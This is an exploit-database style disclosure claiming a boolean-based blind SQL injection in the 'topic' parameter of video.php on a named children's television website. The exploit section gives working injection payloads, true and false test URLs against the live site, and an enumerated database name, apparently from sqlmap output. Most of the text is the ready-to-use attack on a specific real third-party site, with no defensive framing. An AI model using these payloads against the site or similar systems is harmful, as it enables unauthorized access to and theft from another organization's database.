# Exploit Title: Hodhodfarsi.tv SQL Injection Vulnerability
# Exploit Author: kodak
# Date: 2018-11-11
# Vendor Homepage: http://www.hodhodfarsi.tv/
# Category : webapps
# Tested on: Windows and Linux
# CWE : CWE-89
1. Description:
--------------------
Hod hod farsi is a iranian television channel for children and teenagers .
That website has a SQL Injection vulnerability .
2. Exploit/POC:
--------------------
hodhodfarsi.tv/video.php?topic=[SQL Injection]
Parameter: topic (GET)
Location : /video.php
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topic=1' AND 9002=9002 AND 'kodak'='kodak
Vector: AND [INFERENCE]
Available databases [1]:
[*] hodhodfa_farsi
Is True --> hodhodfarsi.tv/video.php?topic=1' AND 'kodak'='kodak
Is False --> hodhodfarsi.tv/video.php?topic=1' AND 'kodak'='PWRDS
3. Screenshot
--------------------
https://imgur.com/a/LRF1Whb
https://imgur.com/a/aCVDkvx
